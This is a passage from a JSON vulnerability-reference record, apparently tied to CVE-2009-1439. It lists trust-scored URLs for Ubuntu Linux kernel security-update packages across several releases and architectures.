        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.28_2.6.28-13.45_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-14.35_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-powerpc_2.6.15-54.77_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-24-powerpc-smp_2.6.24-24.55_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-13.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-386_2.6.24-24.55_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-13-virtual_2.6.28-13.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-24-lpiacompat_2.6.24-24.55_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-k7_2.6.15-54.77_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-14-server_2.6.27-14.35_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-24-rt_2.6.24-24.55_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-24-virtual_2.6.24-24.55_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-24-generic_2.6.24-24.55_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-rt_2.6.24-24.55_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-13_2.6.28-13.45_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-14-server_2.6.27-14.35_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-24-lpia_2.6.24-24.55_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-54-sparc64-di_2.6.15-54.77_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-24-openvz_2.6.24-24.55_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.28-13-lpia_2.6.28-13.45_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-24-server_2.6.24-24.55_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-server_2.6.15-54.77_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-24-powerpc64-smp_2.6.24-24.55_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-amd64-xeon_2.6.15-54.77_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-14-server_2.6.27-14.35_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-24-386-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-amd64-server_2.6.15-54.77_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1439"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-24-powerpc_2.6.24-24.55_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-24-sparc64-smp_2.6.24-24.55_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-24.55_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.28-13.45_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-24-powerpc64-smp-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-24-generic-di_2.6.24-24.55_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-14_2.6.27-14.35_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-24-generic-di_2.6.24-24.55_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-24-powerpc-di_2.6.24-24.55_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb"
      },
      {
